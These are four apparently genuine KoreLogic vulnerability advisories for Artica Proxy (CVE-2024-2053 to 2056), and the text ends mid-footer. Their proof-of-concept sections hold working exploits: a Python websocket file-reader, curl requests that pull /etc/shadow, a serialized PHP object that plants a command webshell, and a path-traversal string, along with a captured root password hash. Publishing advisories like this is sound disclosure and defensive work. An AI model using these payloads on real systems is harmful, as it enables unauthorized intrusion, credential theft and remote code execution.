<pre><code>KL-001-2024-004: Artica Proxy Loopback Services Remotely Accessible Unauthenticated<br /><br />Title: Artica Proxy Loopback Services Remotely Accessible Unauthenticated<br />Advisory ID: KL-001-2024-004<br />Publication Date: 2024.03.05<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-004.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: Artica<br /> Affected Product: Artica Proxy<br /> Affected Version: 4.50<br /> Platform: Debian 10 LTS<br /> CWE Classification: CWE-288: Authentication Bypass Using an<br /> Alternate Path or Channel, CWE-552: Files<br /> or Directories Accessible to External<br /> Parties<br /> CVE ID: CVE-2024-2056<br /><br /><br />2. Vulnerability Description<br /><br /> Services that are running and bound to the loopback<br /> interface on the Artica Proxy are accessible through<br /> the proxy service. In particular, the "tailon" service is<br /> running as the root user, is bound to the loopback interface,<br /> and is listening on TCP port 7050. Security issues associated<br /> with exposing this network service are documented at<br /> https://github.com/gvalkov/tailon#security. Using the tailon<br /> service, the contents of any file on the Artica Proxy can be<br /> viewed.<br /><br /><br />3. Technical Description<br /><br /> root@artica-450:~# netstat -anop | grep LIST | egrep '127.0.|::' | awk '{ print $4 " " $7 }'<br /> 127.0.0.1:57585 <PID>/(squid-1)<br /> 127.0.0.1:8562 <PID>/nginx:<br /> 127.0.0.1:884 <PID>/sshd<br /> 127.0.0.55:53 <PID>/dnscache<br /> 127.0.0.1:9143 <PID>/[authlog]<br /> 127.0.0.1:5432 <PID>/postgres<br /> 127.0.0.1:2521 <PID>/artica-smtpd<br /> 127.0.0.1:2874 <PID>/monit<br /> 127.0.0.1:19102 <PID>/[cache-tail]<br /> 127.0.0.1:3333 <PID>/go-shield-serv<br /> 127.0.0.1:389 <PID>/slapd<br /> 127.0.0.1:3334 <PID>/go-exec<br /> 127.0.0.1:7050 <PID>/tailon<br /> :::4949 <PID>/perl<br /> :::9025 <PID>/[error-page]<br /><br /> root@artica-450:~# ps -efww | grep tailon<br /> root 2765 1 0 Nov07 ? 00:01:29 /sbin/tailon --allow-download --config /etc/tailon/config.toml <br />alias=Syslog,group=System,/var/log/syslog alias=Daemons,group=Services,/var/log/*.log <br />alias=Proxy,group=Service-Proxy,/var/log/squid/*.log alias=Nginx,group=Service-Web,/var/log/nginx/*.log<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> No response from vendor; no remediation available.<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Jim Becher and Jaggar<br /> Henry of KoreLogic, Inc.<br /><br /><br />6. Disclosure Timeline<br /><br /> 2023.12.18 - KoreLogic requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2023.12.18 - Artica Support issues automated ticket #1703011342<br /> promising follow-up from a human.<br /> 2024.01.10 - KoreLogic again requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from<br /> mail.articatech.com with response<br /> "Client host rejected: Go Away!"<br /> 2024.01.11 - KoreLogic requests vulnerability contact and<br /> secure communication method via<br /> https://www.articatech.com/ 'Contact Us' web form.<br /> 2024.01.23 - KoreLogic requests CVE from MITRE.<br /> 2024.01.23 - MITRE issues automated ticket #1591692 promising<br /> follow-up from a human.<br /> 2024.02.01 - 30 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.06 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.15 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.22 - KoreLogic reaches out to alternate CNA for<br /> CVE identifiers.<br /> 2024.02.26 - 45 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.29 - Vulnerability details presented to AHA!<br /> (takeonme.org) by proxy.<br /> 2024.03.01 - AHA! issues CVE-2024-2056 to track this<br /> vulnerability.<br /> 2024.03.05 - KoreLogic public disclosure.<br /><br /><br />7. Proof of Concept<br /><br /> $ python3 exploit.py 192.168.2.139 /etc/shadow<br /> 1701282189.746 35 192.168.2.99 TCP_TUNNEL/200 3496 CONNECT 0.0.0.0:7050 - HIER_DIRECT/0.0.0.0:7050 - <br />mac=\\\"e0:d5:5e:0a:d3:24\\\" category:%200%0D%0Acategory-name:%20Unknown%0D%0Aclog:%20cinfo:0-Unknown;%0D%0A <br />exterr=\\\"-|-\\\"<br />root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::<br /> daemon:*:19507:0:99999:7:::<br /> bin:*:19507:0:99999:7:::<br /> sys:*:19507:0:99999:7:::<br /> sync:*:19507:0:99999:7:::<br /> games:*:19507:0:99999:7:::<br /> man:*:19507:0:99999:7:::<br /> ...<br /> ...<br /><br /><br /> ### exploit.py<br /><br /> import re<br /> import sys<br /> import json<br /> import websocket<br /><br /> """<br /> run `pip install websocket-client` before executing.<br /> """<br /><br /> ARTICA_PROXY_IP = sys.argv[1] if len(sys.argv) >= 2 else '172.17.0.1'<br /> FILE_TO_READ = sys.argv[2] if len(sys.argv) >= 3 else '/etc/passwd'<br /> WEBSOCKET_URI = 'ws://0.0.0.0:7050/tailon/ws/1337/korelogic/websocket'<br /><br /> payload = {<br /> 'command': 'sed',<br /> 'script': f'r {FILE_TO_READ}',<br /> 'entry': {<br /> 'path': '/var/log/squid/access.log',<br /> 'alias': 'Proxy/access.log',<br /> },<br /> 'nlines': 1<br /> }<br /><br /> websocket_message = json.dumps([json.dumps(payload)])<br /><br /> ws = websocket.WebSocket()<br /> ws.connect(WEBSOCKET_URI, http_proxy_host=ARTICA_PROXY_IP, http_proxy_port='8085', proxy_type='http')<br /> ws.send(websocket_message)<br /><br /> reading = True<br /> while reading:<br /> data = re.search(r'a\["\[\\"o\\",\\"(.*)\\"]"]$', ws.recv())<br /> if data: print(data.group(1))<br /><br /> ws.close()<br /><br /><br />The contents of this advisory are copyright(c) 2024<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />KoreLogic, Inc. is a founder-owned and operated company with a<br />proven track record of providing security services to entities<br />ranging from Fortune 500 to small and mid-sized companies. We<br />are a highly skilled team of senior security consultants doing<br />by-hand security assessments for the most important networks in<br />the U.S. and around the world. We are also developers of various<br />tools and resources aimed at helping the security community.<br />https://www.korelogic.com/about-korelogic.html<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
<pre><code>KL-001-2024-003: Artica Proxy Unauthenticated File Manager Vulnerability<br /><br />Title: Artica Proxy Unauthenticated File Manager Vulnerability<br />Advisory ID: KL-001-2024-003<br />Publication Date: 2024.03.05<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: Artica<br /> Affected Product: Artica Proxy<br /> Affected Version: 4.40 and 4.50<br /> Platform: Debian 10 LTS<br /> CWE Classification: CWE-288: Authentication Bypass Using an<br /> Alternate Path or Channel, CWE-552: Files<br /> or Directories Accessible to External<br /> Parties<br /> CVE ID: CVE-2024-2055<br /><br /><br />2. Vulnerability Description<br /><br /> The "Rich Filemanager" feature of Artica Proxy provides a<br /> web-based interface for file management capabilities. When<br /> the feature is enabled, it does not require authentication by<br /> default, and runs as the root user.<br /><br /><br />3. Technical Description<br /><br /> The Artica Proxy can be installed with a small amount of<br /> "Features" enabled. Within the administrative web interface,<br /> additional features can be installed, enabled, and disabled. The<br /> "Rich Filemanager" feature is disabled by default. Enabling<br /> this feature will spawn a listener on port 5000/tcp bound to<br /> 0.0.0.0. By default, when this feature is enabled, authentication<br /> is not required to access the web interface. The "Rich<br /> Filemanager" runs as the root user. This provides an<br /> unauthenticated attacker complete access to the file system.<br /><br /> root@artica:~# ps -efww | grep -i File<br /> root 1888 1885 0 09:13 ? 00:00:00 php-fpm: pool RICHFILEMANAGER<br /> root 1889 1885 0 09:13 ? 00:00:00 php-fpm: pool RICHFILEMANAGER<br /><br /> This can be exploited by an attacker to add entries in to<br /> /etc/shadow, /etc/passwd, and /etc/ssh/sshd_config to create<br /> an additional root-level account that has the ability to SSH<br /> in to the system.<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> No response from vendor. Rich Filemanager feature is disabled<br /> by default. Leave it that way.<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Jim Becher of KoreLogic,<br /> Inc.<br /><br /><br />6. Disclosure Timeline<br /><br /> 2023.12.18 - KoreLogic requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2023.12.18 - Artica Support issues automated ticket #1703011342<br /> promising follow-up from a human.<br /> 2024.01.10 - KoreLogic again requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from<br /> mail.articatech.com with response<br /> "Client host rejected: Go Away!"<br /> 2024.01.11 - KoreLogic requests vulnerability contact and<br /> secure communication method via<br /> https://www.articatech.com/ 'Contact Us' web form.<br /> 2024.01.23 - KoreLogic requests CVE from MITRE.<br /> 2024.01.23 - MITRE issues automated ticket #1591692 promising<br /> follow-up from a human.<br /> 2024.02.01 - 30 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.06 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.15 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.22 - KoreLogic reaches out to alternate CNA for<br /> CVE identifiers.<br /> 2024.02.26 - 45 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.29 - Vulnerability details presented to AHA!<br /> (takeonme.org) by proxy.<br /> 2024.03.01 - AHA! issues CVE-2024-2055 to track this<br /> vulnerability.<br /> 2024.03.05 - KoreLogic public disclosure.<br /><br /><br />7. Proof of Concept<br /><br /> Step 1: Move /etc/shadow to /tmp/shadow<br /> $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' <br />-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H <br />$'Connection: close' <br />$'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&mode=move&old=%2Fetc%2Fshadow&new=%2Ftmp%2F&_=1700868631198'<br /><br />{"data":{"id":"\/tmp\/shadow","type":"file","attributes":{"name":"shadow","path":"\/tmp\/shadow","readable":1,"writable":1,"created":"","modified":"24 <br />Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":"2037"}}}<br /><br /> Step 2: Download /tmp/shadow<br /> $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: <br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H <br />$'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Pragma: no-cache' -H <br />$'Cache-Control: no-cache' <br />$'http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&path=%2Ftmp%2Fshadow&time=1700885590870'<br /><br />root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::<br /> daemon:*:19507:0:99999:7:::<br /> bin:*:19507:0:99999:7:::<br /> sys:*:19507:0:99999:7:::<br /> sync:*:19507:0:99999:7:::<br /> games:*:19507:0:99999:7:::<br /> man:*:19507:0:99999:7:::<br /> lp:*:19507:0:99999:7:::<br /> mail:*:19507:0:99999:7:::<br /> news:*:19507:0:99999:7:::<br /> uucp:*:19507:0:99999:7:::<br /> proxy:*:19507:0:99999:7:::<br /> www-data:*:19507:0:99999:7:::<br /> backup:*:19507:0:99999:7:::<br /> list:*:19507:0:99999:7:::<br /> irc:*:19507:0:99999:7:::<br /> gnats:*:19507:0:99999:7:::<br /> nobody:*:19507:0:99999:7:::<br /> _apt:*:19507:0:99999:7:::<br /> systemd-timesync:*:19507:0:99999:7:::<br /> systemd-network:*:19507:0:99999:7:::<br /> systemd-resolve:*:19507:0:99999:7:::<br /> messagebus:*:19507:0:99999:7:::<br /> quagga:*:19507:0:99999:7:::<br /> apt-mirror:*:19507:0:99999:7:::<br /> privoxy:*:19507:0:99999:7:::<br /> ntp:*:19507:0:99999:7:::<br /> redsocks:!:19507:0:99999:7:::<br /> prads:*:19507:0:99999:7:::<br /> freerad:*:19507:0:99999:7:::<br /> vnstat:*:19507:0:99999:7:::<br /> stunnel4:!:19507:0:99999:7:::<br /> sshd:*:19507:0:99999:7:::<br /> vde2-net:*:19507:0:99999:7:::<br /> memcache:!:19507:0:99999:7:::<br /> davfs2:*:19507:0:99999:7:::<br /> ziproxy:!:19507:0:99999:7:::<br /> proftpd:!:19507:0:99999:7:::<br /> ftp:*:19507:0:99999:7:::<br /> mosquitto:*:19507:0:99999:7:::<br /> openldap:!:19507:0:99999:7:::<br /> munin:*:19507:0:99999:7:::<br /> msmtp:*:19507:0:99999:7:::<br /> Debian-snmp:!:19507:0:99999:7:::<br /> opendkim:*:19507:0:99999:7:::<br /> avahi:*:19507:0:99999:7:::<br /> glances:*:19507:0:99999:7:::<br /> ArticaStats:!:19507:0:99999:7:::<br /> netdata:!:19507:0:99999:7:::<br /> mysql:!:19507:0:99999:7:::<br /> postfix:!:19507:0:99999:7:::<br /> squid:!:19507:0:99999:7:::<br /> smokeping:!:19507:0:99999:7:::<br /> unbound:!:19645:0:99999:7:::<br /><br /> Step 3: Move /tmp/shadow back to /etc/shadow as not to create a DoS condition<br /> $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' <br />-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H <br />$'Connection: close' <br />$'http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&mode=move&old=%2Ftmp%2Fshadow&new=%2Fetc%2F&_=1700868631208'<br /><br />{"data":{"id":"\/etc\/shadow","type":"file","attributes":{"name":"shadow","path":"\/etc\/shadow","readable":0,"writable":1,"created":"","modified":"24 <br />Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":0}}}<br /><br /><br />The contents of this advisory are copyright(c) 2024<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />KoreLogic, Inc. is a founder-owned and operated company with a<br />proven track record of providing security services to entities<br />ranging from Fortune 500 to small and mid-sized companies. We<br />are a highly skilled team of senior security consultants doing<br />by-hand security assessments for the most important networks in<br />the U.S. and around the world. We are also developers of various<br />tools and resources aimed at helping the security community.<br />https://www.korelogic.com/about-korelogic.html<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
<pre><code>KL-001-2024-002: Artica Proxy Unauthenticated PHP Deserialization Vulnerability<br /><br />Title: Artica Proxy Unauthenticated PHP Deserialization Vulnerability<br />Advisory ID: KL-001-2024-002<br />Publication Date: 2024.03.05<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: Artica<br /> Affected Product: Artica Proxy<br /> Affected Version: 4.50<br /> Platform: Debian 10 LTS<br /> CWE Classification: CWE-502 Deserialization of Untrusted Data<br /> CVE ID: CVE-2024-2054<br /><br /><br />2. Vulnerability Description<br /><br /> The Artica Proxy administrative web application will deserialize<br /> arbitrary PHP objects supplied by unauthenticated users and<br /> subsequently enable code execution as the "www-data" user.<br /><br /><br />3. Technical Description<br /><br /> Prior to authentication, a user can send an HTTP request<br /> to the "/wizard/wiz.wizard.progress.php" endpoint. This<br /> endpoint processes the "build-js" query parameter by base64<br /> decoding the provided value and then calling the "unserialize"<br /> PHP function with the decoded value as input.<br /><br /> Code snippet from "wiz.wizard.progress.php":<br /><br /> if(isset($_GET["build-js"])){buildjs();exit;}<br /> ...<br /> $ARRAY=unserialize(base64_decode($_GET["build-js"]));<br /><br /> To exploit this vulnerability, a user can leverage the<br /> installed "Net_DNS2" library autoloader to instantiate the<br /> "Net_DNS2_Cache_File" class. The "__destruct" method<br /> within this class will write to arbitrary files defined<br /> by the class:<br /><br /> public function __destruct()<br /> {<br /> //<br /> // if there's no cache file set, then there's nothing to do<br /> //<br /> if (strlen($this->cache_file) == 0) {<br /> return;<br /> }<br /><br /> //<br /> // open the file for reading/writing<br /> //<br /> $fp = fopen($this->cache_file, 'a+');<br /> if ($fp !== false) {<br /> ...<br /> if (!is_null($data)) {<br /><br /> //<br /> // write the file contents<br /> //<br /> fwrite($fp, $data);<br /> }<br /><br /> An unauthenticated user can overwrite existing files and<br /> insert a webshell to execute malicious PHP as the "www-data"<br /> user.<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> No response from vendor. This vulnerability can be remediated<br /> by deleting the 'usr/share/artica-postfix/wizard' directory<br /> if it is not needed. Otherwise, move it to a location outside<br /> of the web root.<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Jaggar Henry of KoreLogic,<br /> Inc.<br /><br /><br />6. Disclosure Timeline<br /><br /> 2023.12.18 - KoreLogic requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2023.12.18 - Artica Support issues automated ticket #1703011342<br /> promising follow-up from a human.<br /> 2024.01.10 - KoreLogic again requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from<br /> mail.articatech.com with response<br /> "Client host rejected: Go Away!"<br /> 2024.01.11 - KoreLogic requests vulnerability contact and<br /> secure communication method via<br /> https://www.articatech.com/ 'Contact Us' web form.<br /> 2024.01.23 - KoreLogic requests CVE from MITRE.<br /> 2024.01.23 - MITRE issues automated ticket #1591692 promising<br /> follow-up from a human.<br /> 2024.02.01 - 30 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.06 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.15 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.22 - KoreLogic reaches out to alternate CNA for<br /> CVE identifiers.<br /> 2024.02.26 - 45 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.29 - Vulnerability details presented to AHA!<br /> (takeonme.org) by proxy.<br /> 2024.03.01 - AHA! issues CVE-2024-2054 to track this<br /> vulnerability.<br /> 2024.03.05 - KoreLogic public disclosure.<br /><br /><br />7. Proof of Concept<br /><br /> To overwrite the "wiz.upload.php" file to contain a PHP<br /> webshell, the following serialized object can be base64<br /> encoded and submitted via the "build-js" query parameter:<br /><br />O:19:"Net_DNS2_Cache_File":4:{s:10:"cache_file";s:47:"/usr/share/artica-postfix/wizard/wiz.upload.php";s:16:"cache_serializer";s:4:"json";s:10:"cache_size";i:9999999999;s:10:"cache_data";a:1:{s:30:"<?php <br />system($_GET['cmd']); ?>";a:2:{s:10:"cache_date";i:0;s:3:"ttl";i:9999999999;}}}<br /><br /> $ ARTICA_URL="https://127.0.0.1:9000"; PAYLOAD_CMD="id"; curl -k <br />"$ARTICA_URL/wizard/wiz.wizard.progress.php?build-js=TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI6NDp7czoxMDoiY2FjaGVfZmlsZSI7czo0NzoiL3Vzci9zaGFyZS9hcnRpY2EtcG9zdGZpeC93aXphcmQvd2l6LnVwbG9hZC5waHAiO3M6MTY6ImNhY2hlX3NlcmlhbGl6ZXIiO3M6NDoianNvbiI7czoxMDoiY2FjaGVfc2l6ZSI7aTo5OTk5OTk5OTk5O3M6MTA6ImNhY2hlX2RhdGEiO2E6MTp7czozMDoiPD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bIjthOjI6e3M6MTA6ImNhY2hlX2RhdGUiO2k6MDtzOjM6InR0bCI7aTo5OTk5OTk5OTk5O319fQ%3d%3d" <br />&& curl -k "$ARTICA_URL/wizard/wiz.upload.php?cmd=$PAYLOAD_CMD";<br /><br /> {"uid=33(www-data) gid=33(www-data) groups=33(www-data)<br /> ":{"cache_date":1696883506,"ttl":8303116493}}<br /><br /><br />The contents of this advisory are copyright(c) 2024<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />KoreLogic, Inc. is a founder-owned and operated company with a<br />proven track record of providing security services to entities<br />ranging from Fortune 500 to small and mid-sized companies. We<br />are a highly skilled team of senior security consultants doing<br />by-hand security assessments for the most important networks in<br />the U.S. and around the world. We are also developers of various<br />tools and resources aimed at helping the security community.<br />https://www.korelogic.com/about-korelogic.html<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
<pre><code>KL-001-2024-001: Artica Proxy Unauthenticated LFI Protection Bypass Vulnerability<br /><br />Title: Artica Proxy Unauthenticated LFI Protection Bypass Vulnerability<br />Advisory ID: KL-001-2024-001<br />Publication Date: 2024.03.05<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-001.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: Artica<br /> Affected Product: Artica Proxy<br /> Affected Version: 4.40 and 4.50<br /> Platform: Debian 10 LTS<br /> CWE Classification: CWE-23: Relative Path Traversal<br /> CVE ID: CVE-2024-2053<br /><br /><br />2. Vulnerability Description<br /><br /> The Artica Proxy administrative web application attempts to<br /> prevent local file inclusion. These protections can be bypassed<br /> and arbitrary file requests supplied by unauthenticated<br /> users will be returned according to the privileges of the<br /> "www-data" user.<br /><br /><br />3. Technical Description<br /><br /> Prior to authentication, a user can send an HTTP request to<br /> the "images.listener.php" endpoint. This endpoint processes<br /> the "mailattach" query parameter and concatonates the user<br /> supplied value to the "/opt/artica/share/www/attachments/"<br /> file path. The contents of the file located at the newly<br /> created path is returned in the HTTP response body.<br /><br /> The "images.listener.php" endpoint attempts to prevent<br /> a local file inclusion vulnerability by stripping strings<br /> that attempt to traverse into the parent directory from<br /> the user supplied "mailattach" value:<br /><br />$_GET["mailattach"]=str_replace("////","/",$_GET["mailattach"]);<br />$_GET["mailattach"]=str_replace("///","/",$_GET["mailattach"]);<br />$_GET["mailattach"]=str_replace("//","/",$_GET["mailattach"]);<br />$_GET["mailattach"]=str_replace("../","",$_GET["mailattach"]);<br />$_GET["mailattach"]=str_replace("/etc/","",$_GET["mailattach"]);<br />$_GET["mailattach"]=str_replace("passwd","",$_GET["mailattach"]);<br />$file="/opt/artica/share/www/attachments/{$_GET["mailattach"]}";<br /> header("Content-type: application/force-download" );<br /> header("Content-Disposition: attachment; \<br /> filename=\"{$_GET["mailattach"]}\"");<br /> header("Content-Length: ".filesize($file)."" );<br /> header("Expires: 0" );<br /> readfile($file);<br /><br /> If effective, this approach would limit files<br /> accessible by this endpoint to those within the<br /> "/opt/artica/share/www/attachments/" directory. Unfortunately,<br /> the removal of the "../" string is only performed once, so<br /> the resulting file path is not checked. By using the path<br /> "..././foo.txt", the "images.listener.php" endpoint removes the<br /> "../" string resulting in "../foo.txt" - a relative file path<br /> to traverse to the parent directory.<br /><br /> The strings "/etc/" and "passwd" are also stripped from the file<br /> path as many methods of detecting a path traversal vulnerability<br /> rely on fetching the "/etc/passwd" file. By inserting these<br /> strings into specific locations, a user suppplied "mailattach"<br /> value such as "/epasswdtc/ppasswdasswd" is transformed into<br /> "/etc/passwd", bypassing the protection entirely.<br /><br /> An unauthenticated user can leverage this endpoint to read<br /> files on the system, according to the privileges of the<br /> "www-data" user.<br /><br /><br />4. Mitigation and Remediation Recommendation<br /><br /> No response from vendor; no remediation available.<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Jaggar Henry of KoreLogic,<br /> Inc.<br /><br /><br />6. Disclosure Timeline<br /><br /> 2023.12.18 - KoreLogic requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2023.12.18 - Artica Support issues automated ticket #1703011342<br /> promising follow-up from a human.<br /> 2024.01.10 - KoreLogic again requests vulnerability contact and<br /> secure communication method from Artica.<br /> 2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from<br /> mail.articatech.com with response<br /> "Client host rejected: Go Away!"<br /> 2024.01.11 - KoreLogic requests vulnerability contact and<br /> secure communication method via<br /> https://www.articatech.com/ 'Contact Us' web form.<br /> 2024.01.23 - KoreLogic requests CVE from MITRE.<br /> 2024.01.23 - MITRE issues automated ticket #1591692 promising<br /> follow-up from a human.<br /> 2024.02.01 - 30 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.06 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.15 - KoreLogic requests update on CVE from MITRE.<br /> 2024.02.22 - KoreLogic reaches out to alternate CNA for<br /> CVE identifiers.<br /> 2024.02.26 - 45 business days have elapsed since KoreLogic<br /> attempted to contact the vendor.<br /> 2024.02.29 - Vulnerability details presented to AHA!<br /> (takeonme.org) by proxy.<br /> 2024.03.01 - AHA! issues CVE-2024-2053 to track this<br /> vulnerability.<br /> 2024.03.05 - KoreLogic public disclosure.<br /><br /><br />7. Proof of Concept<br /><br /> $ curl -k <br />'https://192.168.2.129:9000/images.listener.php?uri=1&mailattach=..././..././..././..././..././epasswdtc/ppasswdasswd'<br /> root:x:0:0:root:/root:/bin/bash<br /> daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br /> bin:x:2:2:bin:/bin:/usr/sbin/nologin<br /> sys:x:3:3:sys:/dev:/usr/sbin/nologin<br /> sync:x:4:65534:sync:/bin:/bin/sync<br /> games:x:5:60:games:/usr/games:/usr/sbin/nologin<br /> man:x:6:12:man:/var/cache/man:/usr/sbin/nologin<br /> lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin<br /> mail:x:8:8:mail:/var/mail:/usr/sbin/nologin<br /> news:x:9:9:news:/var/spool/news:/usr/sbin/nologin<br /> uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin<br /> proxy:x:13:13:proxy:/bin:/usr/sbin/nologin<br /> www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br /> backup:x:34:34:backup:/var/backups:/usr/sbin/nologin<br /> list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin<br /> irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin<br /> gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin<br /> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin<br /> _apt:x:100:65534::/nonexistent:/usr/sbin/nologin<br /> systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin<br /> systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin<br /> systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin<br /> messagebus:x:104:110::/nonexistent:/usr/sbin/nologin<br /> mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false<br /> quagga:x:106:114:Quagga routing suite,,,:/run/quagga/:/usr/sbin/nologin<br /> apt-mirror:x:107:115::/var/spool/apt-mirror:/bin/sh<br /> privoxy:x:108:65534::/etc/privoxy:/usr/sbin/nologin<br /> ntp:x:109:117::/nonexistent:/usr/sbin/nologin<br /> redsocks:x:110:118::/var/run/redsocks:/usr/sbin/nologin<br /> prads:x:111:120::/home/prads:/usr/sbin/nologin<br /> freerad:x:112:121::/etc/freeradius:/usr/sbin/nologin<br /> vnstat:x:113:122:vnstat daemon,,,:/var/lib/vnstat:/usr/sbin/nologin<br /> stunnel4:x:114:123::/var/run/stunnel4:/usr/sbin/nologin<br /> sshd:x:115:65534::/run/sshd:/usr/sbin/nologin<br /> vde2-net:x:116:124::/var/run/vde2:/usr/sbin/nologin<br /> memcache:x:117:125:Memcached,,,:/nonexistent:/bin/false<br /> davfs2:x:118:126::/var/cache/davfs2:/usr/sbin/nologin<br /> ziproxy:x:119:127::/var/run/ziproxy:/usr/sbin/nologin<br /> proftpd:x:120:65534::/run/proftpd:/usr/sbin/nologin<br /> ftp:x:121:65534::/srv/ftp:/usr/sbin/nologin<br /> mosquitto:x:122:128::/var/lib/mosquitto:/usr/sbin/nologin<br /> openldap:x:123:129:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false<br /> munin:x:124:130:munin application user,,,:/var/lib/munin:/usr/sbin/nologin<br /> msmtp:x:125:131::/var/lib/msmtp:/usr/sbin/nologin<br /> Debian-snmp:x:126:132::/var/lib/snmp:/bin/false<br /> opendkim:x:127:133::/var/run/opendkim:/usr/sbin/nologin<br /> avahi:x:128:134:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin<br /> glances:x:129:135::/var/lib/glances:/usr/sbin/nologin<br />ArticaStats:x:1000:1000:ArticaStats:/home/ArticaStats:/bin/bash<br /> Debian-exim:x:130:138::/var/spool/exim4:/usr/sbin/nologin<br /> smokeping:x:131:139:SmokePing daemon,,,:/var/lib/smokeping:/usr/sbin/nologin<br /> debian-spamd:x:132:140::/var/lib/spamassassin:/bin/sh<br /> netdata:x:1001:1002:netdata:/home/netdata:/bin/bash<br /> postfix:x:1002:1001::/home/postfix:/bin/sh<br /> ...<br /> ...<br /><br /><br />The contents of this advisory are 